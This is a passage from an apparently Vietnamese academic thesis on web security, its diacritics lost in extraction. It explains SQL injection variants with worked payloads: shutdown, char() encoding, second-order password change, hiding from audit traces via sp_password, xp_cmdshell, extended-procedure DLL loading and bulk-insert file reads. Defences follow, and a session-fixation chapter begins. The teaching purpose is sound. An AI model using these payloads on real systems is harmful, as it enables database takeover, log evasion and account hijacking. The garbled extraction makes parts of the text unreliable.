lnh INSERT c dng trong cc trng hp nh: thng tin ng k ngi s

dng, guestbookv..v

Kthut ;, -- c dng nh tng dng vi cu lnh SELECT, phi m

bo ng s lng v kiu gi trc nhp vo nhm trnh li v c php (nukhng xc nh c kiu d liu c th nhp tt c l s).

V d 6.III.5-1:

SQLString= INSERT INTO User VALUES ( & strUsername & , &

strName& , & strPassWord & ,& strLimitSize & )


73/169

Khoa CNTT


-Trang 70-

III.6. Tn cng da vo STORED PROCEDURE

Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc

tp trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhinhacker vn c th li dng nhng Stored Procedure tn cng vo h thng.

V d 6.III.6-1: Stored procedure sp_login gm hai tham s l username v

password. Nu nhp:

Username: nhimmap

Password: ;shutdown--

Lnh gi stored procedure nh sau:

exec sp_login nhimmap,;shutdown--

Lnh shutdown thc hin dng SQL Server ngay lp tc.

III.7. Nng cao

III.7.1. Chui k tkhng c du nhy n:Nhng nh lp trnh c th bo vng dng ca h bng cch loi b tt c

du nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2

du nhy.

V d 6.III.7.1-1:

Function escape (input)

Input=replace(input, , )

escape=input

end function


74/169

Khoa CNTT


-Trang 71-

R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu

mun to ra mt chui gi tr m khng dng cc du nhy, c th dng hm

char() nh v d sau:

V d 6.III.7.1-2:

INSERT into User VALUES(666, char(0x63) +char(0x68)

+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68)

+char(0x72) +char(0x69) +char(0x73),0xffff)

V d 6.III.7.1-3 trn tuy l mt cu truy vn khng c du nhy n no

nhng n vn c th insert chui vo bng, v tng ng vi:

INSERT into User VALUES( 666,chris,chris,255)

Hacker cng c th chn username , password l s trnh du nhy nh v

d sau:

V d 6.III.7.1-4:

INSERT into User VALUES( 667,123,123,0xffff)

SQL server s tng chuyn t s sang chui.

III.7.2. Tn cng 2 tng

Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn

on m SQL .

V d 6.III.7.2-1: ng k account trong ng dng, nhp username nh sau:

Username: admin'

Password: passofadmin


75/169

Khoa CNTT


-Trang 72-

ng dng s thay th du nhy, kt qu trong cu insert s nh sau:

INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

(nhng trong csd liu s lu l admin--)

Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m

ASP c thit km bo rng ngi s dng phi nhp ng mt khu c

trc khi nhp mt khu mi. on m nh sau:

username = escape( Request.form("username") );

oldpassword = escape( Request.form("oldpassword") );

newpassword = escape( Request.form("newpassword") );

var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username

+ "' and password = '" + oldpassword + "'";

rso.open( sql, cn );

if (rso.EOF)

{

Cu truy vn thit lp mt khu mi nh sau:

sql = "update users set password = '" + newpassword + "' where

username= '" + rso("username") + "'"

rso(username) chnh l gi tr username c c cu truy vn login v n l

admin--

Cu truy vn lc ny nh sau:


76/169

Khoa CNTT


-Trang 73-

update users set password = 'password' where username =

'admin'--'

Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh.

y l 1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c

s dng cch loi b d liu. Gii php tt nht l loi b nhng gi tr li

hn l chnh sa li. Nhng c mt vn l c mt s nhp d liu (nh

nhp tn) cho php nhng k t ny. V d: OBrien.

Cch tt nht gii quyt vn ny l khng cho php nhp du nhy n.

Nu iu ny khng th thc hin c , th loi b v thay th nh trn.

Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo

cu truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim

sot mt cch cht ch.

Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng

cch gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s

kiu tn cng khng th thc hin c nhng vn c ch h hacker li

dng.

V d 6.III.7.2-2:

Gi s c username v password u b gii hn ti a l 16 k t. Nhp:

Username: aaaaaaaaaaaaaaa

Password :; shutdown--


77/169

Khoa CNTT


-Trang 74-

ng dng s thay th mt du nhy n bng hai du nhy n nhng do

chiu di chui b gii hn ch l 16 k t nn du nhy n va c thm s

b xo mt. Cu lnh SQL nh sau:

Select * from users where username=aaaaaaaaaaaaaaa and

password=; shutdown

kt qu l username trong cu lnh c gi tr l:

aaaaaaaaaaaaaaa and password=

III.7.3. Trnh skim sot:

SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX,

cho php ghi nhn nhiu s kin xy ra trong csd liu. c bit l cc s

kin T-SQL, ghi nhn li tt c cc cu lnh SQL thc hin trn Server. Nu

ch kim sot c bt th tt c cc cu truy vn SQL ca hacker cng b

ghi nhn v nh m mt ngi qun tr c th kim sot nhng g ang xy

ra v nhanh chng tm ra c gii php. Nhng cng c mt cch chng

li iu ny, bng cch thm dng sp_password vo cu lnh T-SQL, v khi

gp chui ny th vic kim tra s ghi nhn nh sau:

-- sp_password was found in the text of this event.

-- The text has benn replaced with this comment for security

reasons.

ngay c khi sp_password xut hin trong phn ch thch.

V th du tt c cu truy vn tn cng, ch cn n gin l thm

sp_password vo sau -- nh sau:


78/169

Khoa CNTT


-Trang 75-

Username:admin--sp_password

III.7.4. Dng Extended Stored Procedure

III.7.4.1. Dng Extended Stored Procedure c sn trong h thng

SQL Server

Nu ci SQL Server ch mc nh th SQL Server chy trn nn

SYSTEM, tng ng mc truy cp Windows. C th dng

master..xp_cmdshell thi hnh lnh t xa:

; exec master..xp_cmdshell 'ping 10.10.1.2'--

Th dng du nhy i (") nu du nhy n (') khng lm vic.

Di y l mt s extended stored procedure m hacker thng hay s

dng thc thi nhng cu lnh xem ni dung thng tin trong my nn

nhn:

Xp_availablemedia hin th nhng a hin hnh trn my

Xp_dirtree hin th tt c cc th mc k c th mc con

Xp_loginconfig Ly thng tin v ch bo mt trn server

Xp_makecab cho php ngi s dng to cc tp tin lu tr trn

Server (hay bt c tp tin no m server c th truy


79/169

Khoa CNTT


-Trang 76-

n

III.7.4.2. Dng Extended Stored Procedure tto

Extended stored procedure API l mt chng trnh c mt nhim vn

gin l to ra mt DLL extended stored porcedure cha ng on m nguy

him. a tp tin DLL ln Server c th dng cc cu lnh, hoc cc kthut giao tip khc nhau c thc hin tng, nh l HTTP download v

FTP script.

Mt khi t p tin DLL tn ti trn my ch, th hacker c th to mt

extended stored procedure bng dng lnh sau :

V d 6.III.7.4.2-1:sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll

Sau c th thc thi n nh l thc thi extended stored procedure thng

thng :

exec xp_webserver

Khi thc hin xong, c th xo bng lnh sau:sp_dropextendedproc xp_webserver

Xp_ntsec_enumdomain lit k nhng domain m server c th truy vn.

Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.


80/169

Khoa CNTT


-Trang 77-

III.7.4.3. Nhp tp tin vn bn vo bng

Dng lnh bulk insert, nhp d liu t mt tp tin vn bn vo trong mt

bng tm thi.

V d 6.III.7.4.3-1:V d to mt bng n gin nh sau:

create table foo (line varchar(8000))

Sau chy cu lnh bulk insert chp d liu t tp tin vo bng

V d 6.III.7.4.3-2:

bulk insert foo from c:\inetpub\wwwroot\process_login.asp

Ni dung trang process_login.asp c th ly v bng cch dng nhng k

thut nh trong V d 6.III.7.4-3.

IV. CCH PHNG CHNG

Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL trc

khi c s dng.

Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic

phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi

dng bng cch thay th nhng li thng bo bng 1 trang do ngi pht trinthit k mi khi li xy ra trn ng dng.

Kim tra kgi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v..


81/169

Khoa CNTT


-Trang 78-

Hy loi b cc k t meta nh ',",/,\,; v cc k t extend nh NULL, CR, LF, ...

trong cc string nhn c t:

o d liu nhp do ngi dng trnh

o cc tham s t URL

o cc gi tr t cookie

i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hin cu

truy vn SQL, hoc dng ISNUMERIC chc chn n l mt s integer.

Dng thut ton m ho d liu

IV.1. Kim tra dliu

Kim tra tnh ng n ca d liu l 1 vn phc tp v thng cha c

quan tm ng mc trong cc ng dng. Khuynh hng ca vic kim tra tnh

ng n ca d liu khng phi l ch cn thm mt s chc nng vo ng dng,

m phi kim tra mt cch tng qut nhanh chng t c mc ch.

Nhng tm tt sau y s bn v vic kim tra tnh ng n ca d liu, cng vi

v d mu minh ho cho vn ny.

C ba gii php tip cn vn ny:

1) C gng kim tra v chnh sa lm cho d liu hp l.

2) Loi b nhng d liu bt hp l.

3) Ch chp nhn nhng d liu hp l

Gii php 1: kh thc hin

Th nht, ngi lp trnh khng cn thit phi bit tt c d liu bt hp l,

bi v nhng dng d liu bt hp l rt a dng.


82/169

Khoa CNTT


-Trang 79-

Th hai, l vn ca trng hp b tn cng 2 tng (second-oder SQL

injection) trong vic ly d liu t h thng ra.

Gii php 2:b v hiu trong cc trng hp nh gii php 1 l do :

D liu bt hp l lun lun thay i v cng vi vic pht trin cc kiu tn

cng mi.

Gii php 3: tt hn hai gii php kia, nhng s gp mt s hn ch khi ci

t.

Cch bo mt tt nht l kt hp c gii php 2 v 3. Mt v d cho s cn

thit kt hp 2-3 l du ni gia h v tn Quentin Bassington-Bassington

phi cho php du gch ngang trong bnh ngha d liu hp l, nhng chui

k t -- l mt chui k tc bit trong SQL server.

V d nu c b lc :

Lc b nhng d liu bt hp l nh --,select v union

Mt hm kim sot loi b du nhy n th c thi ph nh sau.

union select @@version--

Mt s cch ci t cc chc nng kim tra d liu cbn

Cch 1: Thay th du nhy n:

function escape( input )

input = replace(input, "'", "''")

escape = input

end function


83/169

Khoa CNTT


-Trang 80-

Cch 2: T chi d liu bt hp l

function validate_string( input )

known_bad = array( "select", "insert", "update",

"delete", "drop","--", "'" )

validate_string = true

for i = lbound( known_bad ) to ubound( known_bad )

if ( instr( 1, input, known_bad(i), vbtextcompare )

0 )

then

validate_string = false

exit function

end if

next

end function

Cch 3: Ch chp nhn d liu hp l

function validatepassword( input )

good_password_chars =

"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

validatepassword = true

for i = 1 to len( input )

c = mid( input, i, 1 )

if ( InStr( good_password_chars, c ) = 0 ) then

validatepassword = false

exit function

end if

next

end function


84/169

Khoa CNTT


-Trang 81-

IV.2. Kho cht SQL Server (SQL Server Lockdown)

Lun vn cng gii thiu mt phng php bo mt mc qun tr csd

liu.

y l mt danh sch cc cng vic cn lm bo v SQL server:

Xc nh cc phng php kt ni n server:

o Dng tin ch Network Utility kim tra rng ch c cc th vin mng

ang dng l hoat ng.

Kim tra tt c cc ti khon c trong SQL Servero Ch to ti khon c quyn thp cho cc ng dng

o Loi b nhng ti khon khng cn thit

o m bo rng tt c ti khon c mt mt khu hp l,

Kim tra cc i tng tn ti

o Nhiu extended stored procedure c th c xo b mt cch an ton.

Nu iu ny c thc hin, th cng nn xem xt vic loi b lunnhng tp tin .dll cha m ca cc extended stored procedure

o Xo b tt c csd liu mu nh northwind v pubs

o Xa cc stored procedure khng dng nh: master..xp_cmdshell,

xp_startmail, xp_sendmail, sp_makewebtask

Kim tra nhng ti khon no c th truy xut n nhng i tng no

o i vi nhng ti khon ca mt ng dng no dng truy xut csd liu th chc cp nhng quyn hn cn thit ti thiu truy xut

n nhng i tng n cn dng.


85/169

Khoa CNTT


-Trang 82-

Kim tra lp sa cha ca server

o C mt s cch tn cng nh buffer overflow, format string thng

ch n lp bo v ny.

Kim tra cc phin lm vic trn server

Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp

trong SQL Server Security.

Nhn xt:- Qua chng 6 ny, cng thy rng vic kim tra d liu trc khi x l l cn thit.

- ng dng ngoi vic kim tra tnh ng n ca d liu, cn m ha d liu ngay

bn trong csd liu v khng cho xut trang Web li, bo ni dung li c php

SQL hacker khng th thu thp thng tin csd liu.

- Song song l cng vic ca ngi qun tr mng.


86/169

Khoa CNTT

Chng 7: Chim hu phin lm vic

-Trang 83-

Chng 7

CHIM HU PHIN LM VICNi dung:

I. Tng quan v SessionID

II. n nh phin lm vic

III. nh cp phin lm vic


87/169

Khoa CNTT


-Trang 84-

CHNG 7: CHIM HU PHIN LM VIC

I. TNG QUAN V SESSIONID

Nh cp n Session trong chng 2 phn III, session dng lu tr trng

thi lm vic gia trnh duyt v trnh ch. Session ID c th c lu tr trong

cookie hay c nhng vo a ch URL hay trong bin n ca form.

Mi kiu lu tru c u v khuyt im, nhng qua thc t cookie vn l la chn

tt nht, v l phng php an ton nht.

Thng thng, sau khi ngi dng c chng thc da trn nhng thng tin c

nhn nh tn/mt khu, session ID c xem nh mt mt khu tnh tm thi cho

nhng ln yu cu tip theo. iu ny khin cho Session ID l mc tiu ln cho

nhng hacker. Trong nhiu trng hp, hacker ginh c session ID hp l ca

ngi dng t t nhp vo phin lm vic ca h.

XSS cng l mt cch tn cng c th chim c session ID lu tr trong cookie.

Cch tn cng ny gi l session hijacking.

Tn cng vo mt phin lm vic thng c thc hin theo 2 kiu chnh sau:

n nh phin lm vic

nh cp phin lm vic


88/169

Khoa CNTT


-Trang 85-

II.N NH PHIN LM VIC

Trong kiu tn cng n nh mt phin lm vic, hackern nh sn session ID cho

nn nhn trc khi hng nhp vo h thng. Sau , hacker s s dng session IDny buc vo phin lm vic ca nn nhn .

Tm tt qu trnh tn cng:

Bc 1: Thit lp session ID.

H thng qun l session theo 2 hng:

+ Hng t do: chp nhn bt k mt session ID, nu cha tn ti session th to

mi mt session ID+ Hng gii hn: ch chp nhn session ID no ng k trc .

Vi h thng hng t do hacker ch cn thit lp mt session ID bt k, nh v

sau s dng li session ID ny. hng gii hn, hacker phi ng k mt

session ID vi ng dng.

Ph thuc vo qui trnh qun l phin lm vic m hacker lu tr thi gian sng

ca phin lm vic cho n khi nn nhn ng nhp vo h thng. Thng thngmt phin lm vic khng tn ti v hn nh. H thng s tng hy bphin

lm vic nu n khng thc hin mt thao tc no (thi gian nhn ri ) hoc ht

hn nh.

Do bc 1a l k tn cng s bo tr phin lm vic bng cch gi yu cu n

server.


89/169

Khoa CNTT


-Trang 86-

Hnh 7.II-1: Slc qu trnh tn cng ngi dng bng kthut n nh session

Bc 2: Gi ID ny n trnh duyt nn nhn.

Hacker gi session ID va to n ngi dng v vic trao i ID session cn ty

vo ng dng m c th qua URL, bin n form hay cookie. Cc cch tn cng

thng dng gm:

o Tn cng session ID trn tham s URL.

o Tn cng session ID bng bin n form.

o Tn cng session ID trong cookie.

Bc 3: t nhp vo phin lm vic ca nn nhn.

Sau khi nn nhn ng nhp vo h thng qua session ID c chnh sn v

cha thot khi ng dng, hacker lc ny bt u dng session ID bc vo

phin lm vic ca nn nhn.


90/169

Khoa CNTT


-Trang 87-

Hnh 7.II-2: M t chi tit qu trnh thc hin tn cng ngi dng

bng kthut n nh phin lm vic.

Tip theo lun vn s trnh by v cc cch tn cng session ID trong bc 2.


91/169

Khoa CNTT


-Trang 88-

II.1. Tn cng Session ID trn tham s URL

Hacker gi mt lin kt yu cu ngi dng ng nhp vo h thng my ch vi

sessionID c n nh sn trn URL.

V d 7.II.1-1:

http://online.worldbank.com/login.jsp?sessionid=1234

Hnh 7.II.1-1: Tn cng thng qua tham s URL

1. Hacker m dch v trc tuyn ca ngn hng thng qua a ch

online.worldbank.com

2. Nhn c mt session ID t trnh ch xc nh phin lm vic ca

hacker. V d session ID c gi tr l 1234.

3. Sau hacker s tm cch gi mt lin kt n mt ngi dng no c ti

khon trong ngn hng ny. Nhng lin kt thng l dn n trang ng

nh p vo ti khon trong ngn hng v d lin kt l

http://online.workbank.com/login.jsp?sessionid=1234, la ngi dng lm

vic trong phin lm vic ca hackerkhi ngi dng nhn c lin kt ny,


92/169

Khoa CNTT


-Trang 89-

4. Ngi dng b mc la v mng dng Web bng lin kt ca hacker. Do

c session ID (ca hacker) nn trnh ch s khng to mt session ID mi.

5. Ngi dng vn tip tc ng nhp vi thng tin ca mnh qun l ti

khon.

6. Khi hacker s vo ti khon ca ngi dng m khng cn phi ng nhp

v c cng phin lm vic.

Nhn xt: Cch tn cng ny i hi ng dng phi to session ID ngay khi ngi

dng s dng ng dng. Dbpht hin bi ngi dng.

II.2. Tn cng Session ID trong bin n form

Kthut ny cng tng t nh kthut bin n form, ngha l sau khi hacker xem

m HTML ca trang Web, nhn thy session ID c t trong bin n form,

hacker s gi mt sessionID cng trn URL n ngi dng hoc mt trang Web

ging trang ch nhng vi bin n form mang gi tr n nh sn.

Nhn xt: Phng php ny cng khng kh thi v cng d b pht hin nh

phng php trn.

II.3. Tn cng Session ID trong cookie

Bng vic li dng cookie, hacker c ba cch a mt session ID n trnh

duyt ca nn nhn:

S dng ngn ng kch bn( Javascript, VBscript..) thit lp mt cookie

trong trnh duyt ca nn nhn.

S dng th thit lp thuc tnh Set-Cookie

S dng Set-Cookie ca HTTP header tr li


93/169

Khoa CNTT


-Trang 90-

C th l:

a) Thit lp mt cookie trn trnh duyt bng ngn ng kch bn:

Hu ht trnh duyt u h trcc ngn ng kch bn thc thi trn trnh duyt nh

Javascript, VBScript. C hai ngn ng ny c th thit lp mt cookie cho trnh

duyt bng cch thit lp gi tr document.cookie.

V d 7.II.3-1:

http://online.workbank.com/document.cookie=

sessionid=1234; domain= .workbank.com;.idc

Bn cnh , hacker c th thit lp thi gian sng cho cookie, domain cookie

v cch ny ph hp vi nhng h thng hng t do. V d domain no thuc

.workbank.com u c thc c gi tr cookie ny.

b) Dng th vi thuc tnh Set-Cookie:

ng dng cng c th thit lp cookie cho trnh duyt bng th trong

HTML.

V d 7.II.3-2:

< meta http-equiv= Set-Cookie content=sessionid=1234>

Meta tag Injection (Thm th meta):

Vi nhng h thng kim tra i s vi th th kthut XSS gp nhiu

kh khn, do thm th l phng php kh hu hiu cho php thao

tc trn cookie. Thng thng th c t gia th


94/169

Khoa CNTT


-Trang 91-

nhng n vn c th c x l nu t bt c u trong

trang HTML.

V d 7.III-3:

http://online.workbank.dom/.idc

Phng php ny chim u th hn XSS ch khng b ph hy trong IE ( khng

cho php thao tc cc ngn ng kch bn trn trnh duyt), ngoi tr th

c) Thit lp cookie dng thuc tnh Set-Cookie trong header HTTP response:

Cch ny thit lp mt cookie cho trnh duyt bng cch dng Set-Cookie trong

header HTTP thng qua kthut tn cng DNS server,

II.4. Cch phng chngTrc ht cng cn ni r rng vic phng chng kiu tn cng n nh session

ID ny khng thuc trch nhim ca trnh ch Web server, v trnh ch ch cung

cp API qun l phin lm vic cho ng dng. V th,